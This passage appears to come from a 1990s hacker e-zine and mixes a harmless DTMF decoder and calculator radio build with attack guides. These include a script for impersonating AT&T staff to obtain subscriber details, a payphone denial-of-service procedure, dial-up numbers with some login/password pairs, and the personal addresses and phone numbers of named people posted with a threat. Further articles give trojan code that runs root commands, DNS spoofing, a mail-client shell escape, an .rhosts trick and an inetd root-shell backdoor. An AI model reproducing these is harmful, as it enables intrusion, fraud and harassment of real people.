CLS:KEY OFF 20 I=INP(&H279) 30 IF (I AND 128)=128 THEN 30 40 C=0 50 IF (I AND 8)=8 THEN C=C+1 60 IF (I AND 16)=16 THEN C=C+2 70 IF (I AND 32)=32 THEN C=C+4 80 IF (I AND 64)=64 THEN C=C+8 90 IF C=11 THEN PRINT" * ";:GOTO 180 100 IF C=12 THEN PRINT" # ";:GOTO 180 110 IF C=13 THEN PRINT" A ";:GOTO 180 120 IF C=14 THEN PRINT" B ";:GOTO 180 130 IF C=15 THEN PRINT" C ";:GOTO 180 140 IF C=0 THEN PRINT" D ";:GOTO 180 150 IF C=10 THEN PRINT" 0 ";:GOTO 180 160 PRINT C; 170 I=INP(&H279) 180 IF (I AND 128)=0 THEN 180 190 T=TIMER 200 I=INP(&H279) 210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30 220 IF (I AND 128) = 128 THEN 210 230 GOTO 50 In the magazine, it is advised you use gw-basic, which is included with very very early DOS versions. It may or may not work with qbasic etc. I don't know. These are also for UK tones, maybe they are different in the US. ─────────────────────────────────────────────────────────────────────────────── 2. Dealing With Directory Assistance Operators : Qytpo ─────────────────────────────────────────────────────────────────────────────── Alright, this information should be made available to everyone who cares to read it. Any information used from this article is to be used at a persons own risk. i will not be held responsible if any of this is used for wrongfull purposes- ( it can, you just have to get really creative ). Well, to start off, the job of the directory assistance operator, is to give out addresses, phone numbers, and area codes, for the information given to them. The operators can search from names, business names, and government names, despite what anyone tells you, an AT&T DIRECTORY ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address) If the particular operator says they cant, then bug them. yell at them. if they dont do it themselves, they will get their supervisor. and if you make it sound really important they can do it. and if all that doesnt work, try to find a naive operator, tell them you are an AT&T administrator, and say, to press (Control+C) to bring up a CNA search on their switch. A CNA search is a very valuable asset, if you cannot find a CNA operator, give a directory assistance operator a whirl, chances are, if you have a brain, and are a decent actor, you can get the listing for the number you give them. Routing. The calls are routed through a large mainframe in each state department How it works: Say you dial, 602-555-1212. that would put you through to an operator ANYWHERE in the United States, where phoenix calls are routed through to. it will not just appear in 602, allthought that is where it is supposed to. If the switches in 602 are full, the call could end up anywhere in the US. When the operator picks up the reciever- (it is actually a headset that beeps). The call is automatically traced to whatever area code they dialed. so if You dialed (602 555 1212). an operator anywhere in the US, would get a listing on their screen, and a default city, in the upper left hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area code, 602 for example, the operator can search the area codes permitted in that area code..] for example, if you dialed 602-555-1212, the operator would be allowed to search in 502 (the other area code in AZ) However, in some area codes, they will make you redial, like LA, or TEXAS, or NEWYORK; they have so many area codes, For example 310 and 210, in LOS ANGELES If you wanted a listing for LOS ANGELES, and dialed 210-555-1212, and wanted a listing for city in los angeles which was 310, they would make you hang up and dial 310-555-1212. (the operator shuld be saying to himself/herself, "no, this kiddie needz to call 310 instead, or i get fired for giving out bad information"...if they have a clue) Sample Call to a D A O for a CNA Search: ( The best way to get info ) ( caller dials 555-1212 in area code ) <Operator > City please? <Caller > Yes, this is James Thornton at AT&T the AT&T administrative assistance office. I need you to do a CNA Search for me. <Operator > I'm sorry sir, we're not permitted to do CNA searches. <Caller > Yes, I know. May I speak to a supervisor? <Supervisor> This is So and So supervisor, how can I help you sir? <Caller > Yes, this is James Thornton down at the AT&T (also called Excel) office in Florida, we need a CNA search done for a XXX-XXX-XXXX. <Supervisor> One moment please. <Caller > Ok. <Supervisor> Ok, I am (or am not) showing a listing for XXX-XXX-XXXX, would you like that listing sir? <Caller > Yes please, and I would like that verbally. (if you time it just right, you can get the info for free. if yer beige boxing, it doesnt really make a difference tho.) - hang up, say "what" a few times, to make it sound like you didnt get the listing. and hang up before she finishes the second time. she can only bill you while you are on the line, and if she fucks up, you can get away with it with no bill while they read you the number. This method only works for a verbal listing. if yer quick enough. ;) - - - The NPA RULES. - - - NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED -----California---- 213 213 209 408 510 707 916 408 209 510 415 510 707 510 209 408 415 707 916 707 209 415 510 916 714 714 916 209 510 707 -------Texas------- 210 512 915 214 817 903 972 281 409 713 409 281 512 713 817 903 512 210 409 817 915 713 281 409 806 817 915 817 214 409 512 806 903 903 214 409 817 915 210 512 806 817 972 214 817 903 -----New York------ 212 718 914 917 315 518 607 716 516 718 518 315 607 914 607 315 518 716 914 716 315 607 718 212 518 914 914 212 518 607 718 917 (cell) 212 718 914 *note*: all other states can search all NPA's listed in that state. - Qytpo (@#hackers on EFnet) ─────────────────────────────────────────────────────────────────────────────── 3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik ─────────────────────────────────────────────────────────────────────────────── Some Interesting ph0ne #'s [04.07.97] [RUSSiA] +7 095 XXXxxxx written by CyberLirik (lirik@hotmail.com) [www.sqrt.com] ---------------------------------------------------------------- AT&T Calling Cards Service ---------------------------------------------------------------- 9740074 Tone System - AT&T Moscow HQ switch to tone mode press 0 to page operator then by pressing "1" ya can record your voice message then by pressing "2" & "3" ya can hear your record :) 7555042 English-speeking AT&T operator 1555042 Also Automate AT&T Calling System is here ( tone ) 7555555 Russian-speeking AT&T operator 1555555 No AT&T Tone Machine ! ---------------------------------------------------------------- Sprintnet Local Dial-Ups 02501 & 03110 DNICs GlobalOne = Sprintnet = Telenet ---------------------------------------------------------------- 9286344 9600 9280985 9600 9137166 9600 < Only for MAIL 5789119 2400 3428376 9600 real connect 2400 9167373 SprintNet V34-19200 9167272 ??? 9167171 ? 00wait8 RoSprint PPP dialup. ---------------------------------------------------------------- ROSPAC Local Dial-Ups 02500 DNIC ---------------------------------------------------------------- 9270003 9600 9563692 9600 9563690 ---------------------------------------------------------------- RosNet Dialups 02506 DNIC ---------------------------------------------------------------- 975-8403 913-3571 921-2103 201-2030 Voice:(095)206-8570,206-8458,206-7238 442-6422 442-8277 442-7022 442-8388 442-7088 442-8577 442-8077 442-6477 20-906,33-571 Iskra-2 ---------------------------------------------------------------- IBM GLOBAL network Dial-Up (aka old Advantis Network) ---------------------------------------------------------------- 2586420 ---------------------------------------------------------------- Russia@Online Dial-Ups 28.8Kbps ---------------------------------------------------------------- 9132376 30 lines 2584120 60 lines 3619999 2584161 Voice phone ! ---------------------------------------------------------------- InfoNet Euro ---------------------------------------------------------------- 9150001 28.8 9150005 28.8 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2400 temp [unpublished] 2927056 Infonet Euro Voice ! ---------------------------------------------------------------- Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} ) ---------------------------------------------------------------- 9563589 14400 9676767 9676730-9676769 9676767 9676784 9562455 SITA voice! phones 9564736 ---------------------------------------------------------------- BT-Tymnet ---------------------------------------------------------------- 956-0699 9600 Real Tymnet Voice 9563678 503/9563691 TYM-X25 Sync ---------------------------------------------------------------- CentroNet DialUp www.astro.ru ---------------------------------------------------------------- 7511704 14400 ---------------------------------------------------------------- Infotel dialUps [02504] ---------------------------------------------------------------- 9585475 9580226 9580825 9580575 ---------------------------------------------------------------- MMTEL DialUPs [02503] address on login:.db ---------------------------------------------------------------- 3371001 5 lines 2419860 2418340 2461661 ---------------------------------------------------------------- www.Cityline.ru V34 ---------------------------------------------------------------- 2587884 40 lines 9567759 20 2341901 10 2450070 10 2454414 10 ---------------------------------------------------------------- http://www.telekom.ru Elvis+ Proxy 194.190.195.71. DNS 195.190.195.66. temp 192.168.12.1 SLIP login: iptest PPP login: pptest Password: guest ---------------------------------------------------------------- 974-51-22 (24 ½¿¡¿¿) 961-51-22 (24 ½¿¡¿¿) 230-61-84 (5 ½¿¡¿⌐) 152-53-44 152-97-47 152-94-09 152-31-72 152-93-32 152-53-29 152-93-33 152-41-09 152-53-38 258-96-31 (30 ½¿¡¿⌐) 247-66-22 (30 ½¿¡¿⌐) 532-82-47 çÑ½Ñ¡«úαáñß¬¿⌐ πºÑ½ 532-81-98 532-81-29 ---------------------------------------------------------------- www.dataforce.net ---------------------------------------------------------------- 9566749 voice 2889340 2340591 (16 ½¿¡¿⌐) ---------------------------------------------------------------- PTT-Teleport www.ptt.ru ---------------------------------------------------------------- 946-9383 voice about x.25,28,etc 946-9393 modem PPP ---------------------------------------------------------------- Demos 33.8 V34 HST ---------------------------------------------------------------- 958-19-75 958-19-81 l:_demo 956-62-85 p: demo 956-62-86 241-05-05 961-32-00 ---------------------------------------------------------------- Dial ups mailto:_CRUSAIDER2_@MSN.COM ---------------------------------------------------------------- 281-0201 975-0520 (37) ---------------------------------------------------------------- INTEL PORT : ---------------------------------------------------------------- 956-4787 Main 434-1565 Registration 202-6934 Demo ---------------------------------------------------------------- Youth Science Center Linux server Dmitry Ablov 9540012 ---------------------------------------------------------------- Data lines: Line 1: 954-0664 (14400, 24h, UUPC only) 2: 954-0058 (14400, 21:00 - 09:00) 3: 954-0914 ( 9600, 21:00 - 09:00) 4: 954-0147 (33600, 24h, PPP only) 5: 954-0144 (33600, 24h, RAS only) 6: 954-0445 (33600, 24h, restricted) ---------------------------------------------------------------- Comstar Dialup ---------------------------------------------------------------- 2324626 2329696 ---------------------------------------------------------------- www.com2com.ru ---------------------------------------------------------------- 234-7171 PPP check 956-0112 PPP check ---------------------------------------------------------------- www.gamma.ru ---------------------------------------------------------------- 742-04-42 (6 ½¿¡¿⌐ USR Courier 33600) 232-68-06 (5 ½¿¡¿⌐ USR Courier 33600) 913-39-44 (1 ½¿¡¿∩ USR Courier 33600) 939-15-57 (1 ½¿¡¿∩ USR Sportster 28800) 939-35-26 (1 ½¿¡¿∩ USR Sportster 28800) 939-26-18 (Zyxel 19200) 932-88-78 (1 ½¿¡¿∩ GVC 2400) 939-18-51 (1 ½¿¡¿∩ GVC 2400) ---------------------------------------------------------------- Mr Postman sunny.aha.ru ---------------------------------------------------------------- 9566243 42?lines USRobotics Courier V.Everything (33600 V.34+) 9560124 JS Comstar 2512555 MGTS (Moscow PSTN), Miusskiy node 2512591 2511030 ---------------------------------------------------------------- www.co.ru Combellga ---------------------------------------------------------------- 9265020 9357120 (óßÑú« 30 óσ«ñ«ó) ---------------------------------------------------------------- www.techno.ru ---------------------------------------------------------------- 234-33-03 (ßÑα¿∩ 8 ΓÑ½.) 965-09-93 965-09-01 465-67-07 463-25-20 461-82-11 965-10-19 (28 ½¿¡¿⌐) Online guest 234-35-99 ---------------------------------------------------------------- www.redline.ru ---------------------------------------------------------------- 956-67-56 928-84-29 (ßÑα¿∩ 17 ½¿¡¿⌐) 200-24-71 ---------------------------------------------------------------- www.netclub.ru ---------------------------------------------------------------- 2476205 (US Robotics 33600) 2476204 (Zuxel) ---------------------------------------------------------------- www.space.ru ---------------------------------------------------------------- 913-50-20 747-33-55 (óßÑú« 33 ½¿¡¿¿) ---------------------------------------------------------------- www.relcom.ru ---------------------------------------------------------------- 946-99-84 946-99-94 926-50-18 947-55-99 913-57-47 753-07-77 742-57-27 ---------------------------------------------------------------- www.sitek.ru ---------------------------------------------------------------- 963-31-01 963-21-01 963-11-01 964-10-01 (60 ½¿¡¿⌐). ---------------------------------------------------------------- www.glasnet.ru ---------------------------------------------------------------- 928-44-46 928-00-53 262-02-09 262-20-72 262-02-27 927-41-11 975-00-54 971-52-01 (óßÑú« í«½ÑÑ 170 ¼«ñÑ¼¡δσ óσ«ñ«ó). ---------------------------------------------------------------- www.synapse.ru ---------------------------------------------------------------- 201-25-87 203-47-44(Γ) 956-47-87(Γ) ---------------------------------------------------------------- web.rosmail.com POCHET ---------------------------------------------------------------- 924-85-69 956-61-02(30 óσ«ñ«ó) ---------------------------------------------------------------- www.park.ru ---------------------------------------------------------------- 247-62-36 É932-91-40 ---------------------------------------------------------------- www.rinet.ru ---------------------------------------------------------------- 9567800 9138111 (33600) ---------------------------------------------------------------- www.compnet.ru ---------------------------------------------------------------- 964-31-01 963-20-01 ---------------------------------------------------------------- www.corbina.ru ---------------------------------------------------------------- 7559298 (USR Courier 33600) 7851102 ---------------------------------------------------------------- Misc Voice/t0ne/Carrier services ---------------------------------------------------------------- 00wait5 STB Card processing center 00wait9 free information service 9629424 demo user code : 12345 FaxInfo Demo Voice Line 9759220 Telephone Voice Bulletin Board 7059285 leave me mail in 80718 box 9253503 Online registration 4 email 9253507 billing for telephone # 2587474 Logon: 2586435 2586411 2586414 30;32 9269199 9500885 9563686 9564787 Interport Mailbox ( t0ne ) 9560050 Unknown system ( t0ne ) 9585474 PassWord: 7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex 9560885 "The Microsoft Network is no longer providing MSN in Russia" ---------------------------------------------------------------- _always_ BUSY #s ( unpluged ) ---------------------------------------------------------------- 111-11xx 222-2222 980xxxxx-999xxxxx ---------------------------------------------------------------- Gate to Iskra2 lines ---------------------------------------------------------------- 742xxxx Call for 8-097-2nodes 913xxxx Call for 8-097-3nodes -=-=-=-=-=-=-=-=-=-=-= Free 800 Services =-=-=-=-=-=-=-=-=-=-=- ■ Moscow #s 7473320 Rus MCI Operators in California 7473322 Eng connect me to Customer's Service in Russian 7473321 AT&T Operators in New-York 7473323 7473324 Sprint Global, Arizona, USA 7473325 Orua,Canada 7473326 Otele Code ? 7473327 National Calling Center, UK 7473328 7473329 Japan 7473356 Sprint Calling Cards 7473357 7473359 France service 7473360 7473361 Italian service 7473363 Chili ? service ■ National Russian #s 8-10 800 4977211 - æÿÇ( AT&T); 8-10 800 4977222 - æÿÇ( MCI); 8-10 800 4977255 - æÿÇ( Sprint) ; 8-10 800 4977220 - æÿÇ(MCI απßß¬«∩ºδτ¡á∩ ß½πªíá); 8-10 800 4977233 - èá¡áñá (Teleglob); 8-10 800 4977266 - éÑ½¿¬«íα¿Γá¡¿∩(BT); 8-10 800 4977277 - éÑ½¿¬«íα¿Γá¡¿∩( Mercuri); 8-10 800 4977288 - éÑ¡úα¿∩; 8-10 800 4977181 - ƒ»«¡¿∩ ( KDD); 8-10 800 4974358 - ö¿¡½∩¡ñ¿∩( Telecom Finland); 8-10 800 4977032 - üÑ½∞ú¿∩ (Belgacom, calling cards); 8-10 800 4977212 - üÑ½∞ú¿∩ ( Belgacom,operator); 8-10 800 4977039 - êΓá½¿∩ (Iritel); 8-10 800 4977353 - êα½á¡ñ¿∩ ( Telecom Iriland); 8-10 800 4977156 - ù¿½¿; 8-10 800 4977165 - æ¿¡úá»πα; 8-10 800 4977141 - ÿóÑ⌐µáα¿∩. ─────────────────────────────────────────────────────────────────────────────── 4. How to fuck over a UK payphone : so1o / NightRage ─────────────────────────────────────────────────────────────────────────────── We found this out by total coincidence at the Bristol 2600 meeting... This is a DoS (Denial of Service) attack for payphones in the UK, it uses the national test number (175) and your local test number - at your local excahnge, which in Bristol is 17070 (I think), so you do the following... 1) Approach the telephone booth. 2) Pick up the handset. 3) Put 10p into the phone - you will get this back. 4) Dial your local excahnge test number. 5) Put the handset down. 6) Pick the handset up. 7) Dial your national exchange test number. 8) Listen to all the noise and shit for about 10 seconds. 9) Put the handset down. The LCD display in the booth will now say words to the following.. "BT Apologise, but this telephone is out of order." About 30 seconds later, the phone will return back to normal. ─────────────────────────────────────────────────────────────────────────────── 5. Radio link for TI-85 calculators : Michael Jan ─────────────────────────────────────────────────────────────────────────────── ******************************************************************** -- INTRO ----------------------------------------------------------- ******************************************************************** RT LINK (Radio transfer link) basicly functions like a regular TI-LINK except it is wireless! The parts for making this link will cost around $15 - $20 dollars for a pair, and the frequency is adjustable. You may post & share this plan. But please give me credit for my work (at least put my name, Michael Jan). I TESTED this plan, they transfer within the range of 30 to 50 feet. (Which is more than what I expected, great!). The following are the parts you need, you can obtain them at R.S. ******************************************************************** -- PARTS ----------------------------------------------------------- ******************************************************************** PARTS VALUE QUANTITY -------------------------------------------------------------------- TI LINK [TI BLACK LINK] 1 (Cut Into 2) Capacitors [470 pF] 2 [100 pF] 2 [10 pF] 2 [4 pF] 4 [.01 uF] 2 [10 uF] 4 Resistors [10K Ohm] 2 [1.2K Ohm] 2 [33K Ohm] 4 [100 Ohm] 2 [180 Ohm] 2 Transistors [2SC1923] 4 Coil(L) [.27-.3] 4 Battery Holder [Holds 2 AA or 2 AAA] 2 Batteries [AA or AAA] 4 Diode [Germanium] 2 Copper Wire [2 Feet] 2 (Ant.) ***************************************************************************** *** NOTE The Parts Are For TWO RT LINKs, Because They ONLY WORK In PAIRS! *** ***************************************************************************** ******************************************************************* -- DIRECTIONS ----------------------------------------------------- ******************************************************************* 1. Print Out The Schematic Diagram (The Included GIF File), It is Easier To Put Parts Together. 2. Put The Parts Together By Following The Diagram (VERY IMPORTANT). *** NOTE For Schematic Diagram -- Red Wire = From TI Link White Wire = From TI Link (Copper Wire From TI Link Will Not Be Use) R = Resistors C = Capacitors T = Transistors Connect +, - To Battery Holder 3. Adjust The 4 Coil(L)s Clockwise To MAX On Both RT Links. This Will Adjust The Frequences On Both LINKs To Be The Same. (You Can Adjust To Any Frequence You Like Between 90MHz-100MHz) 4. Put 2 Batteries Into Both Holders 5. THAT'S IT!!!, ENJOY YOUR RT-LINK !!!! =) ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. More sIn inf0z : The CodeZero + Friends ─────────────────────────────────────────────────────────────────────────────── sIn are 0fficially property of the CodeZero. ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 Email : ------------------------------------------------------------------------------- Alias : JeNnYGrRl Real Name : Jennifer Chambers Address : Kansas City, MO 61421 USA Telephone : Email : ------------------------------------------------------------------------------- We got more, but not complete, They can run, but they can never hide, http://www.codez.com/inf0z.html ─────────────────────────────────────────────────────────────────────────────── 2. Rooting From Bin : so1o ─────────────────────────────────────────────────────────────────────────────── This is something I was thinking alot about the other day, I was on a System V Release 4, I had just performed the chkperm exploit, which only gives bin access (uid=1 and gid=1) to the system, so even though I own all the files in the /bin/ directory, I am still not root. Here is a very very simple technique I developed for such occasions, this may come in useful one day for someone, somewhere... Write a program that you can get people to run, you could get hold of the source for a common program, such as su or who or mount. Put this line in it somewhere: if ( !strcmp(getlogin(),"root") ) system("whatever you want"); This checks to see if the root login is running your program. If he is, you can have him execute any shell command you'd like. Here are some suggestions: "chmod 666 /etc/passwd" /etc/passwd is the system's password file. The root owns this file. Normally, everyone can read it (the passwords are encrypted) but only the root can write to it. Take a look at it and see how it's formatted if you don't know already. This command makes it possible for you to now write to the file - i.e. create unlimited accounts for yourself and your friends. "chmod 666 /etc/group" By adding yourelf to some high-access groups, you can open many doors. "chmod 666 /usr/lib/uucp/L.sys" Look for this file on your system if it is on the uucp net. It contains dialups and passwords to other systems on the net, and normally only the uucp administrator can read it. Find out who owns this file and get him to unknowingly execute a program to unlock it for you. "rm /etc/passwd" If you can get the root to execute this command, the system's passwd file will be removed and the system will go down and will not come up for some time to come. This is very destructive and evil, but pointless, if you do want to damage a system, at least use your imagination. If you are going to go about adding a trojan horse program to the system, there are some rules you should follow. If the hidden purpose is something major (such as unlocking the user's mbox or deleting all of his files or something) this program shouldn't be a program that people will be running a lot (such as a popular computer game) - once people discover that their files are public access the source of the problem will be discovered quite easily. Save this purpose for a 'test' program (such as a game you're in the process of writing) that you ask individual people to run via mail or 'chatting' with them. As I said, this 'test' program can bomb or print a phony error message after completing its task, and you will just tell the person "well, I guess it needs more work", wait until they log off, and then read whatever file of theirs that you've unlocked. If your trojan horse program's sole purpose is to catch a specific user running it - such as the root or other high-powered user - you can put the code to do so in a program that will be run a lot by various users of the system. Your modification will remain dormant until he runs it. If you cant find the source to 'star trek' or whatever in C, just learn C and convert something from pascal. It can't hurt to learn C as it's a great language. We've just seen what it can do on a UNIX system. Once you've caught the root (i.e. you can now modify the /etc/passwd file) remove the spurious code from your trojan horse program and you'll never be caught. so1o. ─────────────────────────────────────────────────────────────────────────────── 3. DNS Spoofing : so1o ─────────────────────────────────────────────────────────────────────────────── You can now use a new DNS spoofing technique originally developed by johan, I have seen this technique often applied to IRC, and prym was one of the first to use the technique for that purpose. Here is a basic introduction into the DNS concept. -------------------------------------------------- DNS stands for Domain Name Server although you may hear it refered to as Dynamic Name Server. DNS servers are used so that instead of everyone having numeric IP's for their websites and shit, they can use a DNS so that a client can 'lookup' the name (eatme.com for example) to the numeric IP. Basically, a DNS server is a computer which is running a nameserver daemon typically listening on UDP port 53. When a new domain is setup the domain is registered with Internic. Internic then tells its clients who has authority over the domains registered with it. For example say 1.2.3.4 wanted to resolve the address for peachie.com and 1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7 would ask ns.peachie.com what the numeric IP for peachie.com was. Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the name would be resolved. DNS servers generally cache addresses that are looked up by its clients. So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again, 1.3.3.7 would not ask Internic etc. instead it would take the IP that it had previously resolved earlier and say that the numeric IP for peachie.com is 4.3.2.1. the funny part is that the DNS server doesn't do alot of checking when another nameserver replies to its query. It basically just tells the client what is was told at an earlier point and caches it in the same way. This is why we can spoof using such a technique, but we would need root access to a nameserver first, this is one of the biggest setbacks... How to spoof your DNS. ---------------------- Lets say were sitting on ns.peachie.com with root, and we have authority for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the remote nameserver ns.eatme.org so that we can connect to eatme.org with the address of trusted.eatme.org. We could write a program that listens for DNS queries and replies with false information. sitting on ns.peachie.com we could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would ask Internic who had authority for peachie.com and it would reply to ns.eatme.org that ns.peachie.com had authority over peachie.com. Then ns.eatme.org would ask ns.peachie.com what the address for peachie.com was. If we were running a normal DNS then it would tell ns.eatme.org that the address for peachie.com was 4.3.2.1. but we aren't. We'll say that ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2. This exploits the failure to check a few things on the DNS. Basically ns.eatme.org asked what the numeric IP for peachie.com was and we told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded with two awnsers to different question entirely. Now we would simply connect to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply with that answer. Then it would ask for the address of trusted.eatme.org and it would reply with 2.2.2.2. you would then be connected to eatme.org from trusted.eatme.org and in effect DNS spoofing. That's all there is to it, it may be a bit heavy for some people. so1o. ─────────────────────────────────────────────────────────────────────────────── 4. FreeNet : TrN ─────────────────────────────────────────────────────────────────────────────── Breaking security on restricted shells and freenets. What many system administrators fail to realize is that by setting up shells and security on their applications and systems, and generally trying to lock users in a freenet menu environment, it is almost impossible to fully examine every program. Many programs allow you to escape to shells, even in secure mode, especially the older ones. There is a longstanding bug in the gohper application, used by many freenets, that allows you to start up a gopher server, where an entry is created such as ";sh". Following this entry provides a shell. This is the main reason why the original gopher client is no longer in use. A "l;rm -rf *" was just as easy. In todays world, the biggest problem is that freenets usually allow you to edit files. If this is the case, you almost have a 100% chance of you getting into a real shell. What you first have to do is see if you can go through the menu system to edit a file. If you can't that is cool too. We are going to show you how to get a shell out of PINE. It doesn't matter which version, this works all the way up to 3.96. Anyway, like I was saying, you should see if you can either a) edit a file, or b) upload a file. I'm almost sure you can do either. So, lets start a little session here. First, you have to edit your .pinerc. If you can't, download it (or get it from the PINE package), make the changes, and reupload it. What is important is that you edit the feature-list=commands, and have it read something similar to this: feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd After setting this correctly, go further in the file, and until you find the editor= command. It is stated that the editor is normally set to sh, and invoked via _^ [Control-Shift-Dash]. Do you get the idea yet? Set the line to read editor=sh and then save the file. Now for the fun part. Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers, and make the message text blank, except for the work "sh" (without the quotes) on a single line. After this is done, press the alternate editor hotkey (^_). Here is what happens: To : Cc : Attchmnt: Subject : ----- Message Text ----- sh $ Kinda neat. That little $ is the sign that it all worked. What you probably want to do is execute some of the standard commands that tell you a little about where you are: $ uname -a ; uptime ; /sbin/ifconfig -a SunOS pb 4.1.3_U1 1 sun4m 12:14am up 47 days, 12:18, 24 users, load average: 2.71 le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING> inet 199.227.192.35 ffffff00 199.227.192.0 lo0: flags=49<UP,LOOPBACK,RUNNING> inet 127.0.0.1 ff000000 Then a w ; ps -aux would be nice. It can tell you a little about what is going on, and what is safe to do the things you want. You should probably log on late at night, compile slirp if it is only a shell/vt dialin, and then check the system for vunerabilities, unshadowed passwords, etc. I've notified my freenet of their problems, but they don't seem to care. Maybe now they will. Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-) This article by TrN of The CodeZero. I'll have more interesting information on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web page, as it has other security related information. LaterZ. One other thing to consider, if ports 514 / 512 are open, then you can try creating an .rhosts file in your home directory containing "+ +", then use.. rsh -l loginhere systemhere.com csh -i ...and you will get a shell -- so1o. ─────────────────────────────────────────────────────────────────────────────── 5. Backdoors Revised : Blk-Majik ─────────────────────────────────────────────────────────────────────────────── Disclamer: If you do anything mentioned in this article, it is your own fault and any trouble you manage to get into is your own responsibility, not mine. But what am I thinking...like any of you lamers can root a shell :). gr33tz: A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack, plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for making this document possible and helping me out! ============================================================================= section 1: ============================================================================= What is a back door? : Well, kiddies, a backdoor is just a way to remotely get into a shell without being noticed or sometimes logged. This can be done by adding a extra telnet port to the server I will show you a few ways to set up the port, and also how to keep it up even after the admin find it. so1o had a section in a back issue with a back door using the inetd.conf file where you had to end all commands with a ";". Well that annoyed the hell out of me so I have modified his technique. ============================================================================= section 2: ============================================================================= What you need : Basically, you need root on a shell to start (and a Unix based OS). After that, you will need a good editor....say pico or vi. Most of you #shells wh0res need, but lack this important ingredient....a fucking brain. ============================================================================= section 3: ============================================================================= Understanding the technique : After you checked your head, editor, whoami, etc, you are all set. Ok, this is what you look for: /etc/services This file lets you find a port /ect/inetd.conf This is where the backdoor will be ok, in the /etc/services file, you will see something like this: tcpmux 1/tcp #TCP Port Service Multiplexer tcpmux 1/udp #TCP Port Service Multiplexer compressnet 2/tcp #Management Utility compressnet 2/udp #Management Utility compressnet 3/tcp #Compression Process compressnet 3/udp #Compression Process ok, what the fuck is that? ill explain it with this example: ftp 21/tcp #File Transfer [Control] ftp 21/udp #File Transfer [Control] [1] [2]/[3] #[ 4 ] 1: The name of the service of the system. 2: The port that the system uses for the service. 3: The protocol (going to be tcp. You can chose either tcp or udp.) 4: A description of what the service is used for. Aight, thats the service file...you will need this later. now look at the /etc/inetd.conf file. the inetd is a Internet daemon that will listen for tcp requests and UDP prots and then spaws the program when a connection request is made. It will look like this: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A telnet stream tcp nowait root /usr/libexec/tcpd telnetd shell stream tcp nowait root /usr/libexec/tcpd rshd login stream tcp nowait root /usr/libexec/tcpd rlogind -a exec stream tcp nowait root /usr/libexec/tcpd rexecd let me explain it: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A [1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ] 1: Name of deamon in the services file. It tells inetd what to look for in /etc/services to see what port to use when connecting. 2: Type of of socket connection that the deamon will accept. 3: Protocol field which is always TCP or UDP. 4: How long to delay connection. 5: User to run on the deamon as (used with uid/gid permissions etc.) 6: What program will keep the connection. 7: The actual command or daemon. Ok, so what that dose it makes a port for telnet (port 21, as defined in the services file). It has a stream/tcp connection and dosn't wait for a prompt. The user is of root access and uses /ur/libexec/tcpd (but limited commands) Ok, now u know what the shit is for, next step... ============================================================================= section 4: ============================================================================= Installing the backdoor : Backdoor I : Using /etc/inetd.conf and /etc/services ---------------------------------------------------- method 1 : ---------- ok, now go back to the /etc/services file. Look at it and find a service you think the admin will not notice, and that is not in use. remember the name of the service. Now, go to the inetd.conf file. Go to a place with all the services name where the 1 is in the above example. Add you service somewhere so it is hidden within others. For 2, put the port of the service. 3 is tcp, duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be /bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh, 7 is /bin/sh -i here is an example: ftp stream tcp nowait root /bin/sh sh -i Ok, now you have to restart the inetd. do this by typing (as root) : killall -HUP inetd Ok, now lets test it. From a different system... telnet victum.server.com 21 Trying 123.456.78.9... Connected to comp.com Escape character is '^]'. bash# bash# whoami root bash# tip: do NOT use the ftp port...it is just used to often. Pick a service that is not use alot. It will help you keep the backdoor running. method 2: --------- If you are willing, you can add your own service to the service file. This is easy..say you service file is like this: netbios-ssn 139/tcp nbssn imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp ok, look at the ports.....see how they skip a few? well lets fill 1 of them up... netbios-ssn 139/tcp nbssn suled 142/tcp suled imap 143/tcp # imap 